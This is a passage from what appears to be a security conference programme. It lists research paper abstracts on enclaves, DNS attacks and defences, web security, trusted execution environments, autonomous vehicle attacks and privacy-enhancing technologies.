Civet is a framework for partitioning Java applications into enclaves. Civet reduces the number of lines of code in the enclave and uses language-level defenses, including deep type checks and dynamic taint-tracking, to harden the enclave interface. Civet also contributes a partitioned Java runtime design, including a garbage collection design optimized for the peculiarities of enclaves. Civet is efficient for data-intensive workloads; partitioning a Hadoop mapper reduces the enclave overhead from 10× to 16–22% without taint-tracking or 70–80% with taint-tracking.

BesFS: A POSIX Filesystem for Enclaves with a Mechanized Safety Proof

New trusted computing primitives such as Intel SGX have shown the feasibility of running user-level applications in enclaves on a commodity trusted processor without trusting a large OS. However, the OS can still compromise the integrity of an enclave by tampering with the system call return values. In fact, it has been shown that a subclass of these attacks, called Iago attacks, enables arbitrary logic execution in enclave programs. Existing enclave systems have very large TCB and they implement ad-hoc checks at the system call interface which are hard to verify for completeness. To this end, we present BesFS—the first filesystem interface which provably protects the enclave integrity against a completely malicious OS. We prove 167 lemmas and 2 key theorems in 4625 lines of Coq proof scripts, which directly proves the safety properties of the BesFS specification. BesFS comprises of 15 APIs with compositional safety and is expressive enough to support 31 real applications we test. BesFS integrates into existing SGX-enabled applications with minimal impact to TCB. BesFS can serve as a reference implementation for hand-coded API checks.

Network Security

EPIC: Every Packet Is Checked in the Data Plane of a Path-Aware Internet

An exciting insight of recent networking research has been that path-aware networking architectures are able to fundamentally solve many of the security issues of today’s Internet, while increasing overall efficiency and giving control over path selection to end hosts. In this paper, we consider three important issues related to this new networking paradigm: First, network operators still need to be able to impose their own policies to rule out uneconomical paths and to enforce these decisions on the data plane. Second, end hosts should be able to verify that their forwarding decisions are actually followed by the network. Finally, both intermediate routers and recipients should be able to authenticate the source of packets. These properties have been considered by previous work, but there is no existing system that achieves both strong security guarantees and high efficiency.

We propose EPIC, a family of data-plane protocols that provide increasingly strong security properties, addressing all three described requirements. The EPIC protocols have significantly lower communication overhead than comparable systems: for realistic path lengths, the overhead is 3–5 times smaller compared to the state-of-the-art systems OPT and ICING. Our prototype implementation is able to saturate a 40 Gbps link even on commodity hardware due to the use of only few highly efficient symmetric cryptographic operations in the forwarding process. Thus, by ensuring that every packet is checked at every hop, we make an important step towards an efficient and secure future Internet.

ShadowMove: A Stealthy Lateral Movement Strategy

Advanced Persistence Threat (APT) attacks use various strategies and techniques to move laterally within an enterprise environment; however, the existing strategies and techniques have limitations such as requiring elevated permissions, creating new connections, performing new authentications, or requiring process injections. Based on these characteristics, many host and network-based solutions have been proposed to prevent or detect such lateral movement attempts. In this paper, we present a novel stealthy lateral movement strategy, ShadowMove, in which only established connections between systems in an enterprise network are misused for lateral movements. It has a set of unique features such as requiring no elevated privilege, no new connection, no extra authentication, and no process injection, which makes it stealthy against state-of-the-art detection mechanisms. ShadowMove is enabled by a novel socket duplication approach that allows a malicious process to silently abuse TCP connections established by benign processes. We design and implement ShadowMove for current Windows and Linux operating systems. To validate the feasibility of ShadowMove, we build several prototypes that successfully hijack three kinds of enterprise protocols, FTP, Microsoft SQL, and Window Remote Management, to perform lateral movement actions such as copying malware to the next target machine and launching malware on the target machine. We also confirm that our prototypes cannot be detected by existing host and network-based solutions, such as five top-notch anti-virus products (McAfee, Norton, Webroot, Bitdefender, and Windows Defender), four IDSes (Snort, OSSEC, Osquery, and Wazuh), and two Endpoint Detection and Response systems (CrowdStrike Falcon Prevent and Cisco AMP).

Poison Over Troubled Forwarders: A Cache Poisoning Attack Targeting DNS Forwarding Devices

In today’s DNS infrastructure, DNS forwarders are devices standing in between DNS clients and recursive resolvers. The devices often serve as ingress servers for DNS clients, and instead of resolving queries, they pass the DNS requests to other servers. Because of the advantages and several use cases, DNS forwarders are widely deployed and queried by Internet users. However, studies have shown that DNS forwarders can be more vulnerable devices in the DNS infrastructure.

In this paper, we present a cache poisoning attack targeting DNS forwarders. Through this attack, attackers can inject rogue records of arbitrary victim domain names using a controlled domain, and circumvent widely-deployed cache poisoning defences. By performing tests on popular home router models and DNS software, we find several vulnerable implementations, including those of large vendors (e.g., D-Link, Linksys, dnsmasq and MS DNS). Further, through a nationwide measurement, we estimate the population of Chinese mobile clients which are using vulnerable DNS forwarders. We have been reporting the issue to the affected vendors, and so far have received positive feedback from three of them. Our work further demonstrates that DNS forwarders can be a soft spot in the DNS infrastructure, and calls for attention as well as implementation guidelines from the community.

Programmable In-Network Security for Context-aware BYOD Policies

Bring Your Own Device (BYOD) has become the new norm for enterprise networks, but BYOD security remains a top concern. Context-aware security, which enforces access control based on dynamic runtime context, is a promising approach. Recent work has developed SDN solutions to collect device contexts and enforce access control at a central controller. However, the central controller could become a bottleneck and attack target. Processing context signals at the remote controller is also too slow for real-time decision change.

We present a new paradigm, programmable in-network security (Poise), which is enabled by the emergence of programmable switches. At the heart of Poise is a novel security primitive, which can be programmed to support a wide range of context-aware policies in hardware. Users of Poise specify concise policies, and Poise compiles them into different configurations of the primitive in P4. Compared with traditional SDN defenses, Poise is resilient to control plane saturation attacks, and it dramatically increases defense agility.

A Longitudinal and Comprehensive Study of the DANE Ecosystem in Email

The DNS-based Authentication of Named Entities (DANE) standard allows clients and servers to establish a TLS connection without relying on trusted third parties like CAs by publishing TLSA records. DANE uses the Domain Name System Security Extensions (DNSSEC) PKI to achieve integrity and authenticity. However, DANE can only work correctly if each principal in its PKI properly performs its duty: through their DNSSEC-aware DNS servers, DANE servers (e.g., SMTP servers) must publish their TLSA records, which are consistent with their certificates. Similarly, DANE clients (e.g., SMTP clients) must verify the DANE servers’ TLSA records, which are also used to validate the fetched certificates.

DANE is rapidly gaining popularity in the email ecosystem, to help improve transport security between mail servers. Yet its security benefits hinge on deploying DANE correctly. In this paper we perform a large-scale, longitudinal, and comprehensive measurement study on how well the DANE standard and its relevant protocols are deployed and managed. We collect data for all second-level domains under the .com, .net, .org, .nl, and .se TLDs over a period of 24 months to analyze server-side deployment and management. To analyse the client-side deployment and management, we investigate 29 popular email service providers, and four popular MTA and ten DNS software programs.

Our study reveals pervasive mismanagement in the DANE ecosystem. For instance, we found that 36% of TLSA records cannot be validated due to missing or incorrect DNSSEC records, and 14.17% of them are inconsistent with their certificates. We also found that only four email service providers support DANE for both outgoing and incoming emails, but two of them have drawbacks of not checking the Certificate Usage in TLSA records. On the bright side, the administrators of email servers can leverage open source MTA and DNS programs to support DANE correctly.

NXNSAttack: Recursive DNS Inefficiencies and Vulnerabilities

This paper exposes a new vulnerability and introduces a corresponding attack, the NoneXistent Name Server Attack (NXNSAttack), that disrupts and may paralyze the DNS system, making it difficult or impossible for Internet users to access websites, web e-mail, online video chats, or any other online resource. The NXNSAttack generates a storm of packets between DNS resolvers and DNS authoritative name servers. The storm is produced by the response of resolvers to unrestricted referral response messages of authoritative name servers. The attack is significantly more destructive than NXDomain attacks (e.g., the Mirai attack): i) It reaches an amplification factor of more than 1620x on the number of packets exchanged by the recursive resolver. ii) In addition to the negative cache, the attack also saturates the ‘NS’ section of the resolver caches. To mitigate the attack impact, we propose an enhancement to the recursive resolver algorithm, MaxFetch(k), that prevents unnecessary proactive fetches. We implemented the MaxFetch(1) mitigation enhancement on a BIND resolver and tested it on real-world DNS query datasets. Our results show that MaxFetch(1) degrades neither the recursive resolver throughput nor its latency. Following the discovery of the attack, a responsible disclosure procedure was carried out, and several DNS vendors and public providers have issued a CVE and patched their systems.

Web Security and Privacy

Link shimming (also known as URL wrapping) is a technique widely used by websites, where URLs on a site are rewritten to direct link navigations to an intermediary endpoint before redirecting to the original destination. This “shimming” of URL clicks can serve navigation security, privacy, and analytics purposes, and has been deployed by prominent websites (e.g., Facebook, Twitter, Microsoft, Google) for over a decade. Yet, we lack a deep understanding of its purported security and privacy contributions, particularly in today’s web ecosystem, where modern browsers provide potential alternative mechanisms for protecting link navigations without link shimming’s costs.

In this paper, we provide a large-scale empirical evaluation of link shimming’s security and privacy contributions, using Facebook’s real-world deployment as a case study. Our results indicate that even in the modern web, link shimming can provide meaningful security and privacy benefits to users broadly. These benefits are most notable for the sizable populations that we observed with a high prevalence of legacy browser clients, such as in mobile-centric developing countries. We discuss the tradeoff of these gains against potential costs. Beyond link shimming, our findings also provide insights for advancing user online protection, such as on the web ecosystem’s distribution of responsibility, legacy software scenarios, and user responses to website security warnings.

Cached and Confused: Web Cache Deception in the Wild

Web cache deception (WCD) is an attack proposed in 2017, where an attacker tricks a caching proxy into erroneously storing private information transmitted over the Internet and subsequently gains unauthorized access to that cached data. Due to the widespread use of web caches and, in particular, the use of massive networks of caching proxies deployed by content distribution network (CDN) providers as a critical component of the Internet, WCD puts a substantial population of Internet users at risk.

We present the first large-scale study that quantifies the prevalence of WCD in 340 high-profile sites among the Alexa Top 5K. Our analysis reveals WCD vulnerabilities that leak private user data as well as secret authentication and authorization tokens that can be leveraged by an attacker to mount damaging web application attacks. Furthermore, we explore WCD in a scientific framework as an instance of the path confusion class of attacks, and demonstrate that variations on the path confusion technique used make it possible to exploit sites that are otherwise not impacted by the original attack. Our findings show that many popular sites remain vulnerable two years after the public disclosure of WCD.

Our empirical experiments with popular CDN providers underline the fact that web caches are not plug & play technologies. In order to mitigate WCD, site operators must adopt a holistic view of their web infrastructure and carefully configure cache settings appropriate for their applications.

A Tale of Two Headers: A Formal Analysis of Inconsistent Click-Jacking Protection on the Web

Click-jacking protection on the modern Web is commonly enforced via client-side security mechanisms for framing control, like the X-Frame-Options header (XFO) and Content Security Policy (CSP). Though these client-side security mechanisms are certainly useful and successful, delegating protection to web browsers opens room for inconsistencies in the security guarantees offered to users of different browsers. In particular, inconsistencies might arise due to the lack of support for CSP and the different implementations of the underspecified XFO header. In this paper, we formally study the problem of inconsistencies in framing control policies across different browsers and we implement an automated policy analyzer based on our theory, which we use to assess the state of click-jacking protection on the Web. Our analysis shows that 10% of the (distinct) framing control policies in the wild are inconsistent and most often do not provide any level of protection to at least one browser. We thus propose recommendations for web developers and browser vendors to mitigate this issue. Finally, we design and implement a server-side proxy to retrofit security in web applications.

Retrofitting Fine Grain Isolation in the Firefox Renderer

Firefox and other major browsers rely on dozens of third-party libraries to render audio, video, images, and other content. These libraries are a frequent source of vulnerabilities. To mitigate this threat, we are migrating Firefox to an architecture that isolates these libraries in lightweight sandboxes, dramatically reducing the impact of a compromise.

Retrofitting isolation can be labor-intensive, very prone to security bugs, and requires critical attention to performance. To help, we developed RLBox, a framework that minimizes the burden of converting Firefox to securely and efficiently use untrusted code. To enable this, RLBox employs static information flow enforcement, and lightweight dynamic checks, expressed directly in the C++ type system.

RLBox supports efficient sandboxing through either software-based-fault isolation or multi-core process isolation. Performance overheads are modest and transient, and have only minor impact on page latency. We demonstrate this by sandboxing performance-sensitive image decoding libraries (libjpeg and libpng), video decoding libraries (libtheora and libvpx), the libvorbis audio decoding library, and the zlib decompression library.

RLBox, using a WebAssembly sandbox, has been integrated into production Firefox to sandbox the libGraphite font shaping library.

Zero-delay Lightweight Defenses against Website Fingerprinting

Website Fingerprinting (WF) attacks threaten user privacy on anonymity networks because they can be used by network surveillants to identify the webpage being visited by extracting features from network traffic. A number of defenses have been put forward to mitigate the threat of WF, but they are flawed: some have been defeated by stronger WF attacks, some are too expensive in overhead, while others are impractical to deploy.

In this work, we propose two novel zero-delay lightweight defenses, FRONT and GLUE. We find that WF attacks rely on the feature-rich trace front, so FRONT focuses on obfuscating the trace front with dummy packets. It also randomizes the number and distribution of dummy packets for trace-to-trace randomness to impede the attacker’s learning process. GLUE adds dummy packets between separate traces so that they appear to the attacker as a long consecutive trace, rendering the attacker unable to find their start or end points, let alone classify them. Our experiments show that with 33% data overhead, FRONT outperforms the best known lightweight defense, WTF-PAD, which has a similar data overhead. With around 22%–44% data overhead, GLUE can lower the accuracy and precision of the best WF attacks to a degree comparable with the best heavyweight defenses. Both defenses have no latency overhead.

Achieving Keyless CDNs with Conclaves

Content Delivery Networks (CDNs) serve a large and increasing portion of today’s web content. Beyond caching, CDNs provide their customers with a variety of services, including protection against DDoS and targeted attacks. As the web shifts from HTTP to HTTPS, CDNs continue to provide such services by also assuming control of their customers’ private keys, thereby breaking a fundamental security principle: private keys must only be known by their owner.

We present the design and implementation of Phoenix, the first truly “keyless CDN”. Phoenix uses secure enclaves (in particular Intel SGX) to host web content, store sensitive key material, apply web application firewalls, and more on otherwise untrusted machines. To support scalability and multitenancy, Phoenix is built around a new architectural primitive which we call conclaves: containers of enclaves. Conclaves make it straightforward to deploy multi-process, scalable, legacy applications. We also develop a filesystem to extend the enclave’s security guarantees to untrusted storage. In its strongest configuration, Phoenix reduces the knowledge of the edge server to that of a traditional on-path HTTPS adversary. We evaluate the performance of Phoenix with a series of micro- and macro-benchmarks.

Trusted Execution Environments 2

SENG, the SGX-Enforcing Network Gateway: Authorizing Communication from Shielded Clients

Network administrators face a security-critical dilemma. While they want to tightly contain their hosts, they usually have to relax firewall policies to support a large variety of applications. However, liberal policies like this enable data exfiltration by unknown (and untrusted) client applications. An inability to attribute communication accurately and reliably to applications is at the heart of this problem. Firewall policies are restricted to coarse-grained features that are easy to evade and mimic, such as protocols or port numbers.

We present SENG, a network gateway that enables firewalls to reliably attribute traffic to an application. SENG shields an application in an SGX-tailored LibOS and transparently establishes an attestation-based DTLS channel between the SGX enclave and the central network gateway. Consequently, administrators can perfectly attribute traffic to its originating application, and thereby enforce fine-grained per-application communication policies at a central firewall. Our prototype implementation demonstrates that SENG (i) allows administrators to readily use their favorite firewall to enforce network policies on a certified per-application basis and (ii) prevents local system-level attackers from interfering with the shielded application’s communication.

APEX: A Verified Architecture for Proofs of Execution on Remote Devices under Full Software Compromise

Modern society is increasingly surrounded by, and is growing accustomed to, a wide range of Cyber-Physical Systems (CPS), Internet-of-Things (IoT), and smart devices. They often perform safety-critical functions, e.g., personal medical devices, automotive CPS as well as industrial and residential automation, e.g., sensor-alarm combinations. On the lower end of the scale, these devices are small, cheap and specialized sensors and/or actuators. They tend to host small anemic CPUs, have small amounts of memory and run simple software. If such devices are left unprotected, consequences of forged sensor readings or ignored actuation commands can be catastrophic, particularly, in safety-critical settings. This prompts the following three questions: (1) How to trust data produced, or verify that commands were performed, by a simple remote embedded device?, (2) How to bind these actions/results to the execution of expected software? and, (3) Can (1) and (2) be attained even if all software on a device can be modified and/or compromised?

In this paper we answer these questions by designing, demonstrating security of, and formally verifying, APEX: an Architecture for Provable Execution. To the best of our knowledge, this is the first of its kind result for low-end embedded systems. Our work has a range of applications, especially, authenticated sensing and trustworthy actuation, which are increasingly relevant in the context of safety-critical systems. APEX is publicly available and our evaluation shows that it incurs low overhead, affordable even for very low-end embedded devices, e.g., those based on TI MSP430 or AVR ATmega processors.

PARTEMU: Enabling Dynamic Analysis of Real-World TrustZone Software Using Emulation

ARM’s TrustZone technology is the basis for security of billions of devices worldwide, including Android smartphones and IoT devices. Because TrustZone has access to sensitive information such as cryptographic keys, access to TrustZone has been locked down on real-world devices: only code that is authenticated by a trusted party can run in TrustZone. A side-effect is that TrustZone software cannot be instrumented or monitored. Thus, recent advances in dynamic analysis techniques such as feedback-driven fuzz testing have not been applied to TrustZone software. To address the above problem, this work builds an emulator that runs four widely-used, real-world TrustZone operating systems (TZOSes) - Qualcomm’s QSEE, Trustonic’s Kinibi, Samsung’s TEEGRIS, and Linaro’s OP-TEE - and the trusted applications (TAs) that run on them. The traditional challenge for this approach is that the emulation effort required is often impractical. However, we find that TZOSes depend only on a limited subset of hardware and software components. By carefully choosing a subset of components to emulate, we find we are able to make the effort practical. We implement our emulation on PARTEMU, a modular framework we develop on QEMU and PANDA. We show the utility of PARTEMU by integrating feedback-driven fuzz-testing using AFL and use it to perform a large-scale study of 194 unique TAs from 12 different Android smartphone vendors and a leading IoT vendor, finding previously unknown vulnerabilities in 48 TAs, several of which are exploitable. We identify patterns of developer mistakes unique to TrustZone development that cause some of these vulnerabilities, highlighting the need for TrustZone-specific developer education. We also demonstrate using PARTEMU to test the QSEE TZOS itself, finding crashes in code paths that would not normally be exercised on a real device. Our work shows that dynamic analysis of real-world TrustZone software through emulation is both feasible and beneficial.

PHMon: A Programmable Hardware Monitor and Its Security Use Cases

There has been a resurgent trend in the industry to enforce a variety of security policies in hardware. The current trend for developing dedicated hardware security extensions is an imperfect, lengthy, and costly process. In contrast to this trend, a flexible hardware monitor can efficiently enforce and enhance a variety of security policies as security threats evolve. Existing hardware monitors typically suffer from one (or more) of the following drawbacks: a restricted set of monitoring actions, considerable performance and power overheads, or an invasive design. In this paper, we propose a minimally-invasive and efficient implementation of a Programmable Hardware Monitor (PHMon) with expressive monitoring rules and flexible fine-grained actions. PHMon can enforce a variety of security policies and can also assist with detecting software bugs and security vulnerabilities. Our prototype of PHMon on an FPGA includes the hardware monitor and its interface with a RISC-V Rocket processor as well as a complete Linux software stack. We demonstrate the versatility of PHMon and its ease of adoption through four different use cases: a shadow stack, a hardware-accelerated fuzzing engine, an information leak prevention mechanism, and a hardware-accelerated debugger. Our prototype implementation of PHMon incurs 0.9% performance overhead on average, while the hardware-accelerated fuzzing engine improves fuzzing performance on average by 16× over the state-of-the art software-based implementation. Our ASIC implementation of PHMon only incurs a 5% power overhead and a 13.5% area overhead.

Horizontal Privilege Escalation in Trusted Applications

Trusted Execution Environments (TEEs) use hardware-based isolation to guard sensitive data from conventional monolithic OSes. While such isolation strengthens security guarantees, it also introduces a semantic gap between the TEE on the one side and the conventional OS and applications on the other. In this work, we studied the impact of this semantic gap on the handling of sensitive data by Trusted Applications (TAs) running in popular TEEs. We found that the combination of two properties, (i) multi-tenancy and (ii) statefulness in TAs leads to vulnerabilities of Horizontal Privilege Escalation (HPE). These vulnerabilities leaked sensitive session data or provided cryptographic oracles without requiring code execution vulnerabilities in TEE logic. We identified 19 HPE vulnerabilities present across 95 TAs running on three major ARM TrustZone-based trusted OSes. Our results showed that HPE attacks can be used to decrypt DRM protected content, to forge attestations, and to obtain cryptographic keys under all three evaluated OSes. Here, we present HOOPER an automatic symbolic execution based scanner for HPE vulnerabilities, in order to aid manual analysis and to dramatically reduce overall time. In particular, in the Teegris Trusted OS HOOPER is able to identify 19 out of 24 HPE-based attack flows in 24-hours contrasted with our original manual analysis time of approximately four weeks.

TeeRex: Discovery and Exploitation of Memory Corruption Vulnerabilities in SGX Enclaves

Intel’s Software Guard Extensions (SGX) introduced new instructions to switch the processor to enclave mode which protects it from introspection. While the enclave mode strongly protects the memory and the state of the processor, it cannot withstand memory corruption errors inside the enclave code. In this paper, we show that the attack surface of SGX enclaves provides new challenges for enclave developers as exploitable memory corruption vulnerabilities are easily introduced into enclave code. We develop TeeRex to automatically analyze enclave binary code for vulnerabilities introduced at the host-to-enclave boundary by means of symbolic execution. Our evaluation on public enclave binaries reveal that many of them suffer from memory corruption errors allowing an attacker to corrupt function pointers or perform arbitrary memory writes. As we will show, TeeRex features a specifically tailored framework for SGX enclaves that allows simple proof-of-concept exploit construction to assess the discovered vulnerabilities. Our findings reveal vulnerabilities in multiple enclaves, including enclaves developed by Intel, Baidu, and WolfSSL, as well as biometric fingerprint software deployed on popular laptop brands.

Automotive and Drone Security

Stealthy Tracking of Autonomous Vehicles with Cache Side Channels

Autonomous vehicles are becoming increasingly popular, but their reliance on computer systems to sense and operate in the physical world introduces new security risks. In this paper, we show that the location privacy of an autonomous vehicle may be compromised by software side-channel attacks if localization software shares a hardware platform with an attack program. In particular, we demonstrate that a cache side-channel attack can be used to infer the route or the location of a vehicle that runs the adaptive Monte-Carlo localization (AMCL) algorithm. The main contributions of the paper are as follows. First, we show that adaptive behaviors of perception and control algorithms may introduce new side-channel vulnerabilities that reveal the physical properties of a vehicle or its environment. Second, we introduce statistical learning models that infer the AMCL algorithm’s state from cache access patterns and predict the route or the location of a vehicle from the trace of the AMCL state. Third, we implement and demonstrate the attack on a realistic software stack using real-world sensor data recorded on city roads. Our findings suggest that autonomous driving software needs strong timing-channel protection for location privacy.

Towards Robust LiDAR-based Perception in Autonomous Driving: General Black-box Adversarial Sensor Attack and Countermeasures

Perception plays a pivotal role in autonomous driving systems, which utilizes onboard sensors like cameras and LiDARs (Light Detection and Ranging) to assess surroundings. Recent studies have demonstrated that LiDAR-based perception is vulnerable to spoofing attacks, in which adversaries spoof a fake vehicle in front of a victim self-driving car by strategically transmitting laser signals to the victim’s LiDAR sensor. However, existing attacks suffer from effectiveness and generality limitations. In this work, we perform the first study to explore the general vulnerability of current LiDAR-based perception architectures and discover that the ignored occlusion patterns in LiDAR point clouds make self-driving cars vulnerable to spoofing attacks. We construct the first black-box spoofing attack based on our identified vulnerability, which universally achieves around 80% mean success rates on all target models. We perform the first defense study, proposing CARLO to mitigate LiDAR spoofing attacks. CARLO detects spoofed data by treating ignored occlusion patterns as invariant physical features, which reduces the mean attack success rate to 5.5%. Meanwhile, we take the first step towards exploring a general architecture for robust LiDAR-based perception, and propose SVF that embeds the neglected physical features into end-to-end learning. SVF further reduces the mean attack success rate to around 2.3%.

SAVIOR: Securing Autonomous Vehicles with Robust Physical Invariants

Autonomous Vehicles (AVs), including aerial, sea, and ground vehicles, assess their environment with a variety of sensors and actuators that allow them to perform specific tasks such as navigating a route, hovering, or avoiding collisions. So far, AVs tend to trust the information provided by their sensors to make navigation decisions without data validation or verification, and therefore, attackers can exploit these limitations by feeding erroneous sensor data with the intention of disrupting or taking control of the system. In this paper we introduce SAVIOR: an architecture for securing autonomous vehicles with robust physical invariants. We implement and validate our proposal on two popular open-source controllers for aerial and ground vehicles, and demonstrate its effectiveness.

From Control Model to Program: Investigating Robotic Aerial Vehicle Accidents with MAYDAY

With wide adoption of robotic aerial vehicles (RAVs), their accidents increasingly occur, calling for in-depth investigation of such accidents. Unfortunately, an inquiry to “why did my drone crash” often ends up with nowhere, if the root cause lies in the RAV’s control program, due to the key challenges in evidence and methodology: (1) Current RAVs’ flight log only records high-level vehicle control states and events, without recording control program execution; (2) The capability of “connecting the dots” – from controller anomaly to program variable corruption to program bug location – is lacking. To address these challenges, we develop MAYDAY, a cross-domain post-accident investigation framework by mapping control model to control program, enabling (1) in-flight logging of control program execution, and (2) traceback to the control-semantic bug that led to an accident, based on control- and program-level logs. We have applied MAYDAY to ArduPilot, a popular open-source RAV control program that runs on a wide range of commodity RAVs. Our investigation of 10 RAV accidents caused by real ArduPilot bugs demonstrates that MAYDAY is able to pinpoint the root causes of these accidents within the program with high accuracy and minimum runtime and storage overhead. We also found 4 recently patched bugs still vulnerable and alerted the ArduPilot team.

Drift with Devil: Security of Multi-Sensor Fusion based Localization in High-Level Autonomous Driving under GPS Spoofing

For high-level Autonomous Vehicles (AV), localization is highly security and safety critical. One direct threat to it is GPS spoofing, but fortunately, AV systems today predominantly use Multi-Sensor Fusion (MSF) algorithms that are generally believed to have the potential to practically defeat GPS spoofing. However, no prior work has studied whether today’s MSF algorithms are indeed sufficiently secure under GPS spoofing, especially in AV settings. In this work, we perform the first study to fill this critical gap. As the first study, we focus on a production-grade MSF with both design and implementation level representativeness, and identify two AV-specific attack goals, off-road and wrong-way attacks.

To systematically understand the security property, we first analyze the upper-bound attack effectiveness, and discover a take-over effect that can fundamentally defeat the MSF design principle. We perform a cause analysis and find that such vulnerability only appears dynamically and non-deterministically. Leveraging this insight, we design FusionRipper, a novel and general attack that opportunistically captures and exploits take-over vulnerabilities. We evaluate it on 6 real-world sensor traces, and find that FusionRipper can achieve at least 97% and 91.3% success rates in all traces for off-road and wrong-way attacks respectively. We also find that it is highly robust to practical factors such as spoofing inaccuracies. To improve the practicality, we further design an offline method that can effectively identify attack parameters with over 80% average success rates for both attack goals, with the cost of at most half a day. We also discuss promising defense directions.

Plug-N-Pwned: Comprehensive Vulnerability Analysis of OBD-II Dongles as A New Over-the-Air Attack Surface in Automotive IoT

With the growing trend of the Internet of Things, a large number of wireless OBD-II dongles are developed, which can be simply plugged into vehicles to enable remote functions such as sophisticated vehicle control and status monitoring. However, since these dongles are directly connected with in-vehicle networks, they may open a new over-the-air attack surface for vehicles. In this paper, we conduct the first comprehensive security analysis on all wireless OBD-II dongles available on Amazon in the US in February 2019, which were 77 in total. To systematically perform the analysis, we design and implement an automated tool DongleScope that dynamically tests these dongles from all possible attack stages on a real automobile. With DongleScope, we have identified 5 different types of vulnerabilities, with 4 being newly discovered. Our results reveal that each of the 77 dongles exposes at least two types of these vulnerabilities, which indicates a widespread vulnerability exposure among wireless OBD-II dongles on the market today. To demonstrate the severity, we further construct 4 classes of concrete attacks with a variety of practical implications such as privacy leakage, property theft, and even safety threat. We also discuss the root causes and feasible countermeasures, and have made corresponding responsible disclosure.

Privacy Enhancing Technologies

PCKV: Locally Differentially Private Correlated Key-Value Data Collection with Optimized Utility

Data collection under local differential privacy (LDP) has been mostly studied for homogeneous data. Real-world applications often involve a mixture of different data types such as key-value pairs, where the frequency of keys and mean of values under each key must be estimated simultaneously. For key-value data collection with LDP, it is challenging to achieve a good utility-privacy tradeoff since the data contains two dimensions and a user may possess multiple key-value pairs. There is also an inherent correlation between key and values which if not harnessed, will lead to poor utility. In this paper, we propose a locally differentially private key-value data collection framework that utilizes correlated perturbations to enhance utility. We instantiate our framework by two protocols PCKV-UE (based on Unary Encoding) and PCKV-GRR (based on Generalized Randomized Response), where we design an advanced Padding-and-Sampling mechanism and an improved mean estimator which is non-interactive. Due to our correlated key and value perturbation mechanisms, the composed privacy budget is shown to be less than that of independent perturbation of key and value, which enables us to further optimize the perturbation parameters via budget allocation. Experimental results on both synthetic and real-world datasets show that our proposed protocols achieve better utility for both frequency and mean estimations under the same LDP guarantees than state-of-the-art mechanisms.

Actions Speak Louder than Words: Entity-Sensitive Privacy Policy and Data Flow Analysis with PoliCheck

Identifying privacy-sensitive data leaks by mobile applications has been a topic of great research interest for the past decade. Technically, such data flows are not “leaks” if they are disclosed in a privacy policy. To address this limitation in automated analysis, recent work has combined program analysis of applications with analysis of privacy policies to determine the flow-to-policy consistency, and hence violations thereof. However, this prior work has a fundamental weakness: it does not differentiate the entity (e.g., first-party vs. third-party) receiving the privacy-sensitive data. In this paper, we propose POLICHECK, which formalizes and implements an entity-sensitive flow-to-policy consistency model. We use POLICHECK to study 13,796 applications and their privacy policies and find that up to 42.4% of applications either incorrectly disclose or omit disclosing their privacy-sensitive data flows. Our results also demonstrate the significance of considering entities: without considering entity, prior approaches would falsely classify up to 38.4% of applications as having privacy-sensitive data flows consistent with their privacy policies. These false classifications include data flows to third-parties that are omitted (e.g., the policy states only the first-party collects the data type), incorrect (e.g., the policy states the third-party does not collect the data type), and ambiguous (e.g., the policy has conflicting statements about the data type collection). By defining a novel automated, entity-sensitive flow-to-policy consistency analysis, POLICHECK provides the highest-precision method to date to determine if applications properly disclose their privacy-sensitive behaviors.

Walking Onions: Scaling Anonymity Networks while Protecting Users

Scaling anonymity networks offers unique security challenges, as attackers can exploit differing views of the network’s topology to perform epistemic and route capture attacks. Anonymity networks in practice, such as Tor, have opted for security over scalability by requiring participants to share a globally consistent view of all relays to prevent these kinds of attacks. Such an approach requires each user to maintain up-to-date information about every relay, causing the total amount of data each user must download every epoch to scale linearly with the number of relays. As the number of clients increases, more relays must be added to provide bandwidth, further exacerbating the total load on the network.

In this work, we present Walking Onions, a set of protocols improving scalability for anonymity networks. Walking Onions enables constant-size scaling of the information each user must download in every epoch, even as the number of relays in the network grows. Furthermore, we show how relaxing the clients’ bandwidth growth from constant to logarithmic can enable an outsized improvement to relays’ bandwidth costs. Notably, Walking Onions offers the same security properties as current designs that require a globally consistent network view. We present two protocol variants. The first requires minimal changes from current onion-routing systems. The second presents a more significant design change, thereby reducing the latency required to establish a path through the network while providing better forward secrecy than previous such constructions. We implement and evaluate Walking Onions in a simulated onion-routing anonymity network modelled after Tor, and validate that Walking Onions indeed offers significant scalability improvements for networks at or above the size of the current Tor network.

Differentially-Private Control-Flow Node Coverage for Software Usage Analysis

There are significant privacy concerns about the collection of usage data from deployed software. We propose a novel privacy-preserving solution for a problem of central importance to software usage analysis: control-flow graph coverage analysis over many deployed software instances. Our solution employs the machinery of differential privacy and its generalizations, and develops the following technical contributions: (1) a new notion of privacy guarantees based on a neighbor relation between control-flow graphs that prevents causality-based inference, (2) a new differentially-private algorithm design based on a novel definition of sensitivity with respect to differences between neighbors, (3) an efficient implementation of the algorithm using dominator trees derived from control-flow graphs, (4) a pruning approach to reduce the noise level by tightening the sensitivity bound using restricted sensitivity, and (5) a refined notion of relaxed indistinguishability based on distances between neighbors. Our evaluation demonstrates that these techniques can achieve practical accuracy while providing principled privacy-by-design guarantees.

Visor: Privacy-Preserving Video Analytics as a Cloud Service

Video-analytics-as-a-service is becoming an important offering for cloud providers. A key concern in such services is privacy of the videos being analyzed. While trusted execution environments (TEEs) are promising options for preventing the direct leakage of private video content, they remain vulnerable to side-channel attacks.

We present Visor, a system that provides confidentiality for the user’s video stream as well as the ML models in the presence of a compromised cloud platform and untrusted co-tenants. Visor executes video pipelines in a hybrid TEE that spans both the CPU and GPU. It protects the pipeline against side-channel attacks induced by data-dependent access patterns of video modules, and also addresses leakage in the CPU-GPU communication channel. Visor is up to 1000× faster than naïve oblivious solutions, and its overheads relative to a non-oblivious baseline are limited to 2×–6×.

DELF: Safeguarding deletion correctness in Online Social Networks

Deletion is a core facet of Online Social Networks (OSNs). For users, deletion is a tool to remove what they have shared and control their data. For OSNs, robust deletion is both an obligation to their users and a risk when developer mistakes inevitably occur. While developers are effective at identifying high-level deletion requirements in products (e.g., users should be able to delete posted photos), they are less effective at mapping high-level requirements into concrete operations (e.g., deleting all relevant items in data stores). Without framework support, developer mistakes lead to violations of users’ privacy, such as retaining data that should be deleted, deleting the wrong data, and exploitable vulnerabilities.

We propose DELF, a deletion framework for modern OSNs. In DELF, developers specify deletion annotations on data type definitions, which the framework maps into asynchronous, reliable and temporarily reversible operations on backing data stores. DELF validates annotations both statically and dynamically, proactively flagging errors and suggesting fixes.

